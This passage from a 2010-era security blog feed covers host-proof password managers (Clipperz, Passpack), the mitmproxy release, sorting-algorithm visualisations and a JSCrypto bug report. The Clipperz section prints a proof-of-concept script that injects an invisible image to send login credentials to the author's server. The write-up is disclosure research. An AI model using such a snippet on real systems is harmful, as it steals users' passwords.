Maybe someone will notice and alert a moderator, but by the time they un-ban the story nobody cares because it's already 10 hours old and on page 50 of the /new queue. Bob thinks nobody loves him, and retires to live out the remainder of his years, sad and lonely, in a small, unheated hut on a hill outside of town.</p> <p>In this story, I am Bob, Mallory is some innocent schmuck who submitted my <a href="https://corte.si/posts/security/hostproof/">last post</a> to the programming Subreddit while they were silently banned (how were they to know, right?), and the small, unheated hut is the Aeron chair in front of my desk. The blog about ponies, however, is entirely fictional.</p> Host-proof applications: doing it wrong 2010-02-26T00:00:00+00:00 2010-02-26T00:00:00+00:00 https://corte.si/posts/security/hostproof/ <p><b>Please note that the criticism of Clipperz in this post is now out of date - the Clipperz team is clearly very security-focused, and responded quickly to address the concerns raised below. </b></p> <p>Every day I push another bit of my life into the cloud. There was a time when all my personal data lived on one or two drives I could actually see, touch, and sniff. Now, I don't even run a personal backup anymore - my software is on Github, my emails are with Google and the rest of my personal data is spread evenly between Facebook, Twitter and a handful of online productivity tools. I do keep redundant checkouts of the important stuff, but that's really just a side-effect of needing to be able to work off-line. The truth is, my house and all my gear could sink into the swamp tomorrow, and as long as I have a web browser and git I'd be back to work the same day. How wonderful...</p> <p>... but, then again. I think like a devious, malicious cad <a rel="external" href="http://www.nullcube.com">for a living</a>, and where one part of me sees convenience, another sees spooks, privacy violations and unscrupulous monetisation opportunities. 
I can't help but feel we got shafted. We were promised a glorious decentralised future where everyone would be in control of their own data, and instead our lives have been sliced up and warehoused in a small handful of all-powerful, opaque silos. The companies running these things all say the same thing - "Trust us!" - but as data leak follows data leak and privacy violation follows privacy violation, there has to come a time when users decide that promises aren't good enough.</p> <h2 id="host-proof-applications">Host-proof applications</h2> <p>It turns out that the first tentative steps towards a better way of doing things have already been taken. The broad goal is simple: to design web applications in such a way that we don't <em>have</em> to trust the host. Javascript interpreters are fast enough nowadays to do real-world crypto at reasonable speeds, so we can encrypt and decrypt data on the client side and store only encrypted data on the server. The server never sees our encryption keys, and if the implementation is secure, couldn't access our data even if it tried.</p> <p>Two groups of people have pioneered this application development style, under two different names. As far as I can tell, the idea was first articulated in 2005 by <a rel="external" href="http://smokey.rhs.com/web/blog/PowerOfTheSchwartz.nsf/d6plinks/RSCZ-6C5G54">Richard Schwartz</a>, and fleshed out on the ajaxpatterns.org wiki under the name <a rel="external" href="http://ajaxpatterns.org/Host-Proof_Hosting">host-proof hosting</a>. 
Shortly after that, <a rel="external" href="http://clipperz.com">Clipperz</a> floated as the first real-world, commercial implementation of essentially the same idea, but its founders described what they were building as a <a rel="external" href="http://www.clipperz.com/users/marco/blog/2007/08/24/anatomy_zero_knowledge_web_application">zero knowledge web application.</a> Reading these manifestos carefully, it seems clear that although their emphases are different, their core aims and principles are identical. It's also pretty clear that both terms are misnomers. "Zero-knowledge" has a specific <a rel="external" href="http://en.wikipedia.org/wiki/Zero-knowledge_proof">cryptographic meaning</a> that's only peripherally relevant to the broad application design pattern. What's more, the term is misleading to the layperson, since there's no such thing as a "zero-knowledge" application, in any real sense. The server unavoidably knows quite a lot about the client - the address they're connecting from, how frequently they connect, what operations they're executing, what browser they're using, and so on. "Host-proof hosting", on the other hand, assigns the "host-proof" attribute to the wrong end of the pipe. A more accurate term would be <strong>host-proof application</strong>, and that's how I'm going to refer to these ideas in the rest of this post.</p> <p>The pot of gold at the end of this rainbow is to combine the benefits of the cloud with strong, host-independent data security guarantees. The possibilities are incredibly enticing. I can imagine a cryptographic Facebook where you don't need to trust the host to aggregate the entire world's private data in the clear. I can imagine storing medical records and financial data in the cloud while still allowing people to maintain direct control over who uses the data and how. I can imagine a Gmail where everyone uses crypto by default, where decryption and encryption happen right in the browser. 
Yes, the technical obstacles that stand in the way of these dreams are immense, but if we can surmount them a better world lies beyond.</p> <h2 id="two-steps-to-shangri-la">Two steps to Shangri-la</h2> <p>Before we look at some real-world applications, I'd like to briefly talk about two essential elements of a secure host-proof application: client-side security and verification. Let's take each of these in turn.</p> <h3 id="1-client-side-security">1: Client-side security</h3> <p>Host-proof applications turn the traditional web security model on its head. Instead of trying to secure the server from the browser, we have to secure the browser-side application from the server. In fact, we fundamentally <em>don't care</em> about the server side of the equation - the client-side code should be secure no matter what combination of malicious skulduggery happens upstream. Yes, this does mean that a host-proof app's security hinges on the security of the browser scripting environment, which is undoubtedly one of the most security-hostile spaces ever devised by the mind of man. Many sensible people would call it quits right there, but I think we can do a decent job of client side security with careful thought.</p> <h3 id="2-verification">2: Verification</h3> <p>Once we have a secure client-side application, we need to make the tools and information available to allow users to actually verify that the code running in their browser is secure. This immediately implies that the client-side of the application has to be published somewhere independent for peer review. Perhaps surprisingly, we can also conclude that publishing the server code of a host-proof application is a distraction. Spending time verifying the security of the server code is a waste of effort, since we must always assume that the server has already been compromised, and is actively malicious.</p> <p>The next step in the verification process is harder. 
Every time the user visits a host-proof application, they are getting a blob of potentially malicious data from the server. It's vital that there be some mechanism that allows the user to check that the code running in their browser matches the code published for peer review. One obvious but cumbersome way to do that is to make sure that your entire application is a single, rolled-up blob, and then to simply publish a checksum. Although it's a pain in the ass to do, in theory users can download and verify the application's integrity. In reality, the vast majority of users won't ever bother to use a verification system this cumbersome, and even those that do won't do so every time. That's not a good reason to give up, though - making this process workable for users is critical if the host-proof paradigm is to be viable.</p> <h2 id="how-to-penetration-test-a-host-proof-application">How to penetration test a host-proof application</h2> <p>Two characteristic "game-over" scenarios follow immediately from these security elements. First, we could subvert the verification process to fool the user into using a corrupted application. Second, we could exploit a security hole in the client-side application to execute arbitrary code in the browser. If we can do either of these things, a malicious entity in control of the server could access a user's private data and have their merry way with it. Which would be bad. In both these scenarios the server is the attacker - so, where a traditional web app penetration test often revolves around malicious data sent by the browser to the server, a host-proof app penetration test focuses on malicious responses from the server to the browser. 
Of course, there are a myriad of other ways in which the security of a host-proof app can fail - but verification and client-side security are the first two hurdles to cross.</p> <p>At this point, you might be thinking that a tool that lets you tamper with server responses before they hit the browser would be damn handy. Tools like <a rel="external" href="https://addons.mozilla.org/en-US/firefox/addon/966">TamperData</a> let you modify outbound requests, but it turns out that extending them to do the same with inbound data is non-trivial. Not entirely coincidentally, though, I recently released a little tool called <a rel="external" href="http://mitmproxy.org">mitmproxy</a> that does the job just fine. It's an interactive, SSL-capable proxy with a curses interface that sits between your browser and the server, letting you intercept and modify requests and responses on the fly.</p> <p>Let's take mitmproxy for a spin to look at some of the contenders in the host-proof application space.</p> <h2 id="clipperz-facepalm">Clipperz: facepalm</h2> <p>First in line is <a rel="external" href="http://www.clipperz.com">Clipperz</a>, a project I've been following for a number of years. The founders - Marco Barulli and Giulio Cesare Solaroli - were early pioneers of the host-proof application paradigm, and as far as I know, were the first to try to make a livelihood by commercialising the idea. To get a flavour for what they're about, I highly recommend <a rel="external" href="http://itc.conversationsnetwork.org/shows/detail4283.html">this interview</a> that Jon Udell did with Barulli.</p> <p>Now, let's review the claims that Clipperz makes for itself. Its <a rel="external" href="http://www.clipperz.com/about">about</a> page says:</p> <blockquote> <p>We got used to trust online services with our data (photos, text documents, spreadsheets, ...) 
but Clipperz proves that this is not necessary: users can enjoy a web based application without the need to trust the web application provider.</p> </blockquote> <p>The <a rel="external" href="http://www.clipperz.com/support/user_guide">user guide</a> expands on this:</p> <blockquote> <p>Clipperz simply hosts your encrypted cards and provide you with a nice interface to manage your data, but it could never access the cards in their plain form.</p> </blockquote> <p>Well, righty oh! That's a very forthright guarantee. Let's see if Clipperz lives up to it.</p> <h3 id="1-verification">1: Verification</h3> <p>Clipperz takes verification seriously. The entire Clipperz source is prominently published for review. They also seem to have architected their application specifically to make checksum verification possible - the client-side comes down the wire as a single blob, with no external dependencies. This means that verification really can be as simple as taking a checksum over the application page. They even have <a rel="external" href="http://www.clipperz.com/reviewing_the_code/checksums">instructions that show how to do this using wget</a>.</p> <p>There are two important criticisms of the Clipperz verification process. Most critically, they publish the checksums and verification package right on the Clipperz homepage. If we assume that the server has been compromised, the attacker is in control of both the checksums and the app, and we're up the creek. Secondly, although Clipperz has gone to a lot of effort to make the process easy, verification is still too cumbersome. The vast majority of their users will never bother to verify their client-side at all. 
Some more innovation is needed from an already very innovative company to make this process simpler.</p> <p>All told, though, this is a good effort - with a little bit of extra work, Clipperz would get a definite "pass" for verification.</p> <h3 id="2-client-side-security">2: Client-side security</h3> <p>Client-side security is a different story. The moment we look at the traffic between the client and server, it's immediately clear that something is very, very wrong. Here's a sample of what comes down the pipe to the client:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">throw</span><span style="color: #032F62;"> &#39;allowScriptTagRemoting is false.&#39;</span><span>;</span></span> <span class="giallo-l"><span style="color: #6A737D;">//#DWR-INSERT</span></span> <span class="giallo-l"><span style="color: #6A737D;">//#DWR-REPLY</span></span> <span class="giallo-l"><span style="color: #D73A49;">var</span><span> s0</span><span style="color: #D73A49;">=</span><span>{};</span><span style="color: #D73A49;">var</span><span> s1</span><span style="color: #D73A49;">=</span><span>{};s0.result</span><span style="color: #D73A49;">=</span><span style="color: #032F62;">&quot;done&quot;</span><span>;s0.lock</span><span style="color: #D73A49;">=</span><span style="color: #032F62;">&quot;4EB1C567-7FFE-928D-E0C8-11AF8870DE57&quot;</span><span>;</span></span> <span class="giallo-l"><span>s1.requestType</span><span style="color: #D73A49;">=</span><span style="color: #032F62;">&quot;MESSAGE&quot;</span><span>;s1.targetValue</span><span style="color: #D73A49;">=</span><span style="color: #032F62;">&quot;blahblah&quot;</span><span>;s1.cost</span><span style="color: #D73A49;">=</span><span style="color: #005CC5;">2</span><span>;</span></span> <span class="giallo-l"><span>dwr.engine.</span><span style="color: #6F42C1;">_remoteHandleCallback</span><span>(</span><span style="color: 
#032F62;">&#39;5&#39;</span><span>,</span><span style="color: #032F62;">&#39;0&#39;</span><span>,{result:s0,toll:s1});</span></span></code></pre> <p>Don't let the <strong>throw</strong> at the top of the snippet fool you. That gets stripped off by the client-side code, and the remainder of the snippet is then run by the client-side application. Yes, folks: Clipperz uses <a rel="external" href="http://directwebremoting.org/dwr/index.html">DWR</a>, which means that the Clipperz server sends little chunks of Javascript back to the browser, which are then eval-ed in the password manager's context. This means that the application is <em>designed</em> to let the supposedly untrusted server execute arbitrary code in the secure environment that contains your S00P3R S3KR3T data. So all their work to make their application verifiable and all the effort expended to publish their code for review is worth exactly bupkis.</p> <p>Facepalm.</p> <p>To prove that this isn't an academic issue, here's a trivial exploit showing how someone in control of the Clipperz server could access a user's private data even if they went to the effort of verifying the application checksum. <strong>WARNING:</strong> Doing this using your real Clipperz credentials will make your username and password appear in my webserver logs! If you're following along with mitmproxy, you need to set an intercept on responses from Clipperz ("i" for intercept, and use the pattern "~s ~u clipperz"). 
And then add the following lines of code to the first server response after you click the "login" button, just below the "#DWR-REPLY" marker:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">var</span><span> f</span><span style="color: #D73A49;"> =</span><span style="color: #6F42C1;"> getElementsByTagAndClassName</span><span>(</span><span style="color: #032F62;">&quot;input&quot;</span><span>,</span><span style="color: #032F62;"> &quot;loginFormField&quot;</span><span>);</span></span> <span class="giallo-l"><span style="color: #D73A49;">var</span><span> s</span><span style="color: #D73A49;"> =</span><span style="color: #032F62;"> &quot;http://corte.si/sploit/&quot;</span><span>;</span></span> <span class="giallo-l"><span style="color: #D73A49;">for</span><span> (</span><span style="color: #D73A49;">var</span><span> i</span><span style="color: #D73A49;">=</span><span style="color: #005CC5;">0</span><span>; i</span><span style="color: #D73A49;"> &lt;</span><span> f.</span><span style="color: #005CC5;">length</span><span>; i</span><span style="color: #D73A49;">++</span><span>){s</span><span style="color: #D73A49;"> =</span><span> s</span><span style="color: #D73A49;"> +</span><span> f[i].value</span><span style="color: #D73A49;"> +</span><span style="color: #032F62;"> &quot;::&quot;</span><span>;}</span></span> <span class="giallo-l"><span style="color: #D73A49;">var</span><span> e</span><span style="color: #D73A49;"> =</span><span style="color: #6F42C1;"> IMG</span><span>({</span><span style="color: #032F62;">&quot;src&quot;</span><span>: s,</span><span style="color: #032F62;"> &quot;height&quot;</span><span>:</span><span style="color: #032F62;"> &quot;0px&quot;</span><span>,</span><span style="color: #032F62;"> &quot;width&quot;</span><span>:</span><span style="color: #032F62;"> &quot;0px&quot;</span><span>});</span></span> <span class="giallo-l"><span 
style="color: #6F42C1;">appendChildNodes</span><span>(</span><span style="color: #6F42C1;">$</span><span>(</span><span style="color: #032F62;">&quot;header&quot;</span><span>), e);</span></span></code></pre> <p>This rough and ready snippet simply adds an invisible image tag to the page, which loads a bogus image that includes the username and password in the source path. Image sources aren't constrained by the same origin policy, so we can send this data wherever we like - in this case, the server my blog is hosted on. The login process will continue as usual, and unless the user is watching their network traffic carefully, they'll be none the wiser.</p> <h2 id="don-t-worry-clipperz-passpack-does-it-wrong-too">Don't worry Clipperz, Passpack does it wrong too</h2> <p>The other big contender in the host-proof application space is Clipperz' slicker-looking rival, <a rel="external" href="http://www.passpack.com">Passpack</a>. A glance at their security page shows that they definitely refer to themselves as applying the "host-proof hosting" pattern. Their <a rel="external" href="https://www.passpack.com/en/faq/">FAQ</a> makes the typical strong security claim:</p> <blockquote> <p><strong>Can Passpack read my passwords?</strong></p> <p>Not even if we wanted to. It's not possible.</p> </blockquote> <p>Not possible, eh? Well, let's see.</p> <h3 id="1-verification-1">1: Verification</h3> <p>Passpack has completely punted on the verification issue. They don't publish any checksums, they don't publish their source, and their application is split up into innumerable components that would make verification a nightmare. In a blog post <a rel="external" href="http://blog.passpack.com/2007/04/passpack-and-clipperz-the-difference">comparing themselves with Clipperz</a>, they make clear that this is a conscious choice on their part, not an oversight. In fact, they level the same criticism at the Clipperz verification process that I do. 
Clipperz publishes their verification package right on their homepage:</p> <blockquote> <p>However, if I am in a phished version of Clipperz, it's a moot point because the phisherman can falsify those values as well so that they match his spoofed version.</p> </blockquote> <p>This misses the point of the checksum somewhat - we're not trying to protect against phishing, but against a malicious server - but the criticism is valid none the less. Passpack is also right that the Clipperz checksum verification process is too cumbersome:</p> <blockquote> <p>I just don't think anyone would really do that - always, every single time, many times a day.</p> </blockquote> <p>Quite so. But instead of trying to compete with Clipperz by doing a better job on these points, Passpack gave up - they only publish a checksum for the offline version of their application. This is a disastrous decision. Passpack users are compelled to execute whatever the server passes them, without any verification or review. If this was a sudden-death match, that would be Passpack pretty much done right there.</p> <h3 id="2-client-side-security-1">2: Client-side security</h3> <p>But even if they <em>did</em> have a verification mechanism, it still wouldn't help. Firing up mitmproxy, our first look at the traffic seems promising. During the login process we see JSON snippets - which can be deserialized safely - being passed to and fro, rather than chunks of Javascript. Then we notice that the news pane comes through as a chunk of HTML. When we edit the response to add a &lt;script&gt; tag, it gets executed. Furthermore, when we click on any of the menu buttons, gobs of Javascript are pumped into the client app and merrily evaluated. I stopped looking at the application at this point. There's no point showing an example of how someone in control of the server could exploit this situation, because it's clear that preventing script injection is simply not a design goal of the Passpack project. 
So, that's 0 for 2 for Passpack.</p> <h2 id="the-emperor-sure-looks-naked-to-me">The emperor sure looks naked to me</h2> <p>I want to make it clear that I wish both these projects well. Their founders have thrown their hats into the ring, and had the stones to try to make the host-proof application paradigm work in a commercial setting. Both projects have published significant libraries for building host-proof apps (see the <a rel="external" href="http://www.clipperz.com/open_source/javascript_crypto_library">Clipperz Javascript Crypto Library</a>, and the <a rel="external" href="http://www.passpack.com/en/credits/">Passpack Host-Proof Hosting Library</a>) that will undoubtedly make the road easier for those who follow in their footsteps. It's in the interest of all freedom-loving citizens of the Internet that both these companies prosper, because we need more host-proof applications, not fewer. However...</p> <p>Without a client-side that is both secure <strong>and</strong> verified in the sense I describe above, an application simply isn't "host-proof" in any meaningful sense. If your application is designed in such a way that you can simply <strong>ask</strong> your user's browser for their private data, you can't say "we couldn't access your data even if we wanted to", and you can't say "we've designed our system so that you don't have to trust us". Now, I can anticipate some of the response to this statement - people will say that checksum verification isn't practical, that users wouldn't bother, that an application that sticks rigorously to the host-proof application principles would be unusable. This might all be true - but is beside the point. The truth is, if someone hacked the Clipperz or Passpack servers, they <strong>could</strong> steal bank details or server passwords or whatever else people keep in their lockers - so we're relying on the hosts to be secure. 
And like Google and Facebook, Clipperz and Passpack <strong>could</strong> access their users' private data - they're just promising that they won't. Just like everybody else, really.</p> <p>Luckily, the steps required to fix things are clear. Clipperz made a critical mistake in choosing DWR for their client-server communications, but that can be rectified. Passpack needs to abandon its misguided idea that no verification of the client-side application is needed, and do the work to make this possible. Passpack already uses JSON for most of its communication - if they used it consistently for all server communication, their client-side app could be on solid ground. Both projects need to put on their thinking caps, and come up with a better way to approach the client-side verification problem. I'm hopeful that we'll see improvements from both projects in response to this post.</p> <h2 id="up-next-building-a-minimal-host-proof-application">Up next: building a minimal host-proof application</h2> <p>All of this started off the exhaustingly monomaniacal hamster-on-a-wheel that I have where other people have a brain. I found myself awake at 3am, thinking about host-proof apps, and pondering the ineluctable modalities of the verification problem. So, I decided to spend some time building a minimal useful host-proof application to experiment with. Tune in next week for my next thrilling post, where I build and launch a tiny, experimental and unashamedly user-hostile host-proof app.</p> Introducing mitmproxy: an interactive man-in-the-middle proxy 2010-02-16T00:00:00+00:00 2010-02-16T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_1/ <h1> Update: see <a href="http://mitmproxy.org">mitmproxy.org</a> for recent releases!</h1> <p>I spend a lot of time poking at web interfaces, both for penetration testing and generally while developing software. 
This usually involves iteratively making small modifications to requests, and running them again and again until I find a vulnerability or reproduce a bug. Using a browser plugin like <a rel="external" href="https://addons.mozilla.org/en-US/firefox/addon/966">tamperdata</a> is great for a quick first stab at things, but gets clunky quickly. Scripting things up is usually the next step, and that's fine, but time-consuming and not very agile.</p> <div class="media"> <a href="mitmproxy-screenshot.png"> <img src="mitmproxy-screenshot.png" /> </a> </div> <p>So, I'm releasing <strong>mitmproxy</strong> - an interactive, SSL-aware man-in-the-middle proxy that lets you view, modify and replay HTTP connections. It's aimed at software developers and penetration testers (i.e. people like me), who need to intensively tamper with and monitor HTTP traffic. Using it, you can point your browser at a page that loads a bazillion images and 50 snippets of JSON, pick out the one request you're interested in, and modify and replay it over and over. You have complete control over both requests and responses - you can edit headers and content using your preferred text editor, and change HTTP request methods on the fly. You can view request and response contents using an external viewer (picked using your mailcap configuration), or using <strong>mitmproxy</strong>'s built-in text and hexdump-like viewers. Filters and intercepts are specified using regular expressions and a pretty complete mutt-like expression language.</p> <p>Another useful feature is something I call "sticky cookies". I often need to make requests using an authenticated session. This is a pain when logging in requires manual action. Copying cookie values around or scripting up the login process gets old quick. So, <strong>mitmproxy</strong> lets you set cookies on requests matching a specified expression as "sticky", which means that requests without a cookie inherit previously seen cookie values. 
So, you can log in to the target site once using your browser, and subsequent requests using tools like <strong>curl</strong> will automagically look like they're part of an authenticated session.</p> <p>I've just sliced <strong>mitmproxy</strong> raw and quivering out of a much larger internal project, so expect some problems.</p> <p>You can find releases and documentation for <strong>mitmproxy</strong> <a rel="external" href="http://mitmproxy.org">here</a>. As usual, the real action is at the project's <a rel="external" href="http://github.com/cortesi/mitmproxy">git repository</a>.</p> Timsort - a study in grayscale 2010-01-28T00:00:00+00:00 2010-01-28T00:00:00+00:00 https://corte.si/posts/code/timsort-grayscale/ <div class="media"> <a href="timsort.png"> <img src="timsort.png" /> </a> </div> <p>A <a href="https://corte.si/posts/code/sortvis-fruitsalad/">couple of days ago</a> I published a set of explosion-in-a-crayola-factory colourful sorting algorithm visualisations, using a colour sequence generated with the Hilbert curve. The idea was that using a space-filling curve to traverse the RGB colour cube we could get a large number of distinct but visually ordered colours. I contrasted this with a more common method, which is to vary the intensity of a monotone to generate a gradient of colours. A couple of people suggested that I provide a set of grayscale images for comparison. I was curious about this too, so I hacked a grayscale generator into <a rel="external" href="http://github.com/cortesi/sortvis">sortvis</a>. The results were striking, but not interesting enough to reproduce here in full. Subjectively, I think the coloured images do allow you to follow more of the detail in these dense visualisations, but I'm not wedded to the idea. Being able to visually judge the order of elements in a sorting algorithm visualisation is important, and that is something we sacrifice in the Hilbert RGB traversal. 
I still like my <a href="https://corte.si/posts/code/visualisingsorting/">earlier sparse grayscale visualisations</a> best.</p> <p>If you're curious, you can check out <a rel="external" href="http://github.com/cortesi/sortvis">sortvis</a> and generate the full set of grayscale graphs with the following command:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>./dense -g -n 512</span></span></code></pre> <p>I did think the grayscale version of Python's <a href="https://corte.si/posts/code/timsort/">Timsort</a> was worth sharing. It's pretty spectacular due to a purely coincidental 3d effect - not much good for explaining Timsort, but I'd hang it on my wall, for sure.</p> Hilbert Curve + Sorting Algorithms + Procrastination = ? 2010-01-26T00:00:00+00:00 2010-01-26T00:00:00+00:00 https://corte.si/posts/code/sortvis-fruitsalad/ <p>I like the Hilbert curve. I like sorting algorithm visualisations. I occasionally procrastinate when I should be doing more important things. When all these factors converge, the result is a post like this.</p> <p>In a <a href="https://corte.si/posts/code/hilbert/portrait/">previous post</a>, I drew a picture of a Hilbert curve by projecting a Hilbert curve traversal of the RGB colour cube onto a Hilbert curve traversal of the plane (yes, it's a mouthful, but it's a mouthful of awesome). Since then, I've been pondering the general utility of Hilbert curve traversals of the colour cube. In large-scale visualisation, we often want to choose an ordered sequence of colours that have the property that colours close to each other on the sequence are also close to each other visually. The easy way to do this is to restrict yourself to a specific hue, and to vary the intensity. 
I used this idea in grayscale to generate some previous <a href="https://corte.si/posts/code/visualisingsorting/">sorting algorithm visualisations</a>:</p> <div class="media"> <a href="insertionsort.png"> <img src="insertionsort.png" /> </a> <div class="subtitle"> Insertion sort </div> </div> <p>The problem with this approach is that it hugely restricts the number of distinct colours we can use. There are only so many distinct shades of gray the human eye can perceive - I'm already pushing it with 20 distinct colours in the image above. We can do much, much better using the Hilbert curve. Let's assume that human perception of RGB colours is uniform and consistent - that is, that any change along the RGB axes will result in a uniformly proportional difference in perceived colour. This assumption is incorrect, but it's good enough as a first approximation. By traversing the RGB colour cube in Hilbert order, we can get a set of colours that are maximally distinct from each other, with near-optimal colour locality preservation (keeping in mind that perfect locality preservation is impossible). In other words, an equidistant sequence of colours that are simultaneously as different from each other as possible, and where colours 'close' to each other on the sequence are as similar as possible. The result is a colour sequence that looks like this:</p> <div class="media"> <a href="swatch.png"> <img src="swatch.png" /> </a> <div class="subtitle"> 512-colour Hilbert-order swatch </div> </div> <p>We do, of course, pay a price for this mathematical marvel: we can't visually compare colours and see their order in the spectrum. When we really want a large ordered sequence of colours, this can be an acceptable tradeoff.</p> <p>Below is a re-imagining of my previous sorting algorithm visualisations, at a much larger scale than I could achieve using shades of gray. Each image shows a random list of 512 elements being sorted. 
The images are at a 1-pixel per element resolution, and each element has a distinct colour along the Hilbert RGB cube traversal. The aspect ratios differ, because the width of each image is equal to the number of element swaps that occur during the sorting process. I've left out a number of algorithms that end up being too "wide" to be enjoyable - shellsort and bubblesort, I'm looking at you. Oh, and I make absolutely no claims that these particular visualisations are useful or informative. I made them for the same reason Mallory climbed Everest and the chicken crossed the road: because it's there, and to see what's on the other side. Come to think of it, the Mallory-Chicken Impetus explains rather a lot of what I do.</p> <h3 id="selection-sort">Selection sort</h3> <div class="media"> <a href="selectionsort.png"> <img src="selectionsort.png" /> </a> <div class="subtitle"> Selection sort </div> </div><h3 id="insertion-sort">Insertion sort</h3> <div class="media"> <a href="insertionsort.png"> <img src="insertionsort.png" /> </a> <div class="subtitle"> Insertion sort </div> </div><h3 id="python-s-timsort">Python's Timsort</h3> <p>I explained the pattern you see below in a <a href="https://corte.si/posts/code/timsort/">previous post visualising Timsort</a>.</p> <div class="media"> <a href="timsort.png"> <img src="timsort-small.png" /> </a> <div class="subtitle"> Timsort </div> </div><h3 id="quicksort">Quicksort</h3> <div class="media"> <a href="quicksort.png"> <img src="quicksort-small.png" /> </a> <div class="subtitle"> Quicksort </div> </div><h2 id="the-code">The code</h2> <p>As usual, I've published the code used to draw the images in this post. I extended <a rel="external" href="http://github.com/cortesi/scurve">scurve</a>, where I'm collecting algorithms and visualisation techniques related to space-filling curves, to draw colour swatches. 
Then I added a "fruitsalad" visualisation technique to <a rel="external" href="http://github.com/cortesi/sortvis">sortvis</a>, which houses my sorting algorithm visualisation code.</p> An email to the authors of JSCrypto 2010-01-14T00:00:00+00:00 2010-01-14T00:00:00+00:00 https://corte.si/posts/security/jscrypto/ <div class="media"> <a href="facepalm.jpg"> <img src="facepalm.jpg" /> </a> </div> <p><strong>[Update: A fix for these problems and one noted by Peter Burns in the comments to this post has been posted. <a rel="external" href="http://crypto.stanford.edu/sjcl/">Get it while it's hot</a>, folks.]</strong></p> <p>Hi folks,</p> <p>Thanks for a <a rel="external" href="http://crypto.stanford.edu/sjcl/">blazingly fast little crypto library</a>. Please find below a few comments on the code.</p> <p>There's an error in the <strong>is_ready</strong> function of the random number generator. On line 1386 of the <strong>jscrypto.js</strong> file, you have:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">return</span><span> (</span><span style="color: #005CC5;">this</span><span>._pool_entropy[</span><span style="color: #005CC5;">0</span><span>]</span><span style="color: #D73A49;"> &gt;</span><span style="color: #005CC5;"> this</span><span>._BITS_PER_RESEED</span><span style="color: #D73A49;"> &amp;&amp;</span></span> <span class="giallo-l"><span style="color: #D73A49;">new</span><span> Date.</span><span style="color: #6F42C1;">valueOf</span><span>()</span><span style="color: #D73A49;"> &gt;</span><span style="color: #005CC5;"> this</span><span>._next_reseed)</span><span style="color: #D73A49;"> ?</span></span></code></pre> <p>This should be:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">return</span><span> (</span><span style="color: 
#005CC5;">this</span><span>._pool_entropy[</span><span style="color: #005CC5;">0</span><span>]</span><span style="color: #D73A49;"> &gt;</span><span style="color: #005CC5;"> this</span><span>._BITS_PER_RESEED</span><span style="color: #D73A49;"> &amp;&amp;</span></span> <span class="giallo-l"><span style="color: #D73A49;">new</span><span style="color: #6F42C1;"> Date</span><span>().</span><span style="color: #6F42C1;">valueOf</span><span>()</span><span style="color: #D73A49;"> &gt;</span><span style="color: #005CC5;"> this</span><span>._next_reseed)</span><span style="color: #D73A49;"> ?</span></span></code></pre> <p>In Safari, this will cause an error and script termination. In Firefox, the effect is much worse - <b>new Date.valueOf()</b> returns an object, which never compares as greater than any integer. As an unfortunate consequence, that clause can never evaluate to true, and your <a href="http://en.wikipedia.org/wiki/Fortuna_(PRNG)">Fortuna</a> implementation's periodic reseeding never triggers...</p> <p>All is not lost, though, because luckily the <strong>random_words</strong> function in which the return value from <strong>is_ready</strong> is used makes no sense. ;-) To start with, on line 1289 you have:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">if</span><span> (readiness</span><span style="color: #D73A49;"> ==</span><span style="color: #005CC5;"> this</span><span>.</span><span style="color: #005CC5;">NOT_READY</span><span>)</span></span></code></pre> <p>But readiness here is a bit field, and this clause will evaluate to false in half the situations that <strong>is_ready</strong> actually does return NOT_READY. 
You surely want</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">if</span><span> (readiness</span><span style="color: #D73A49;"> &amp;</span><span style="color: #005CC5;"> this</span><span>.</span><span style="color: #005CC5;">NOT_READY</span><span>)</span></span></code></pre> <p>Three lines further down, you have:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">else if</span><span> (readiness</span><span style="color: #D73A49;"> &amp;&amp;</span><span style="color: #005CC5;"> this</span><span>.</span><span style="color: #005CC5;">REQUIRES_RESEED</span><span>)</span></span></code></pre> <p>This, again, doesn't do what it seems - &amp;&amp; is the boolean and, not the bitwise and. Since <strong>this.REQUIRES_RESEED</strong> is simply a positive constant, that really becomes:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">else if</span><span> (readiness)</span></span></code></pre> <p>So despite the bug in <strong>is_ready</strong>, your reseeding function actually runs every time random data is requested. Phew - who says two wrongs don't make a right, ey? Reseeding every time data is requested might open the generator to some interesting entropy exhaustion attacks, but is much better than not reseeding at all.</p> <p>A corollary to all this is that you also need to address the fact that the return value from <strong>is_ready</strong> is used incorrectly in the rest of your code and your examples. 
As it stands, testing for readiness with</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">if</span><span> (Random.</span><span style="color: #6F42C1;">is_ready</span><span>())</span></span></code></pre> <p>is wrong, because your readiness function can return <strong>REQUIRES_RESEED | NOT_READY</strong>, which is a positive integer. I'd recommend changing the interface of <strong>is_ready</strong> to have an obvious boolean return value instead, though - typing</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="javascript"><span class="giallo-l"><span style="color: #D73A49;">if</span><span> (Random.</span><span style="color: #6F42C1;">is_ready</span><span>()</span><span style="color: #D73A49;"> &amp;</span><span> Random.</span><span style="color: #005CC5;">IS_READY</span><span>)</span></span></code></pre> <p>is a bit of a mouthful.</p> <p>Thanks again for jscrypto.</p> <br/> <br/> <p>Regards,</p> <br/> <p>Aldo</p> <p><strong>[No animals were harmed producing this post. Content lightly edited for markup and formatting from the original email. Yes, I really do like JSCrypto - this error-hiding-an-error was amusing, but the AES implementation seems good (although the jury's still out on the SHA256 portion).]</strong></p> Generating colour maps with 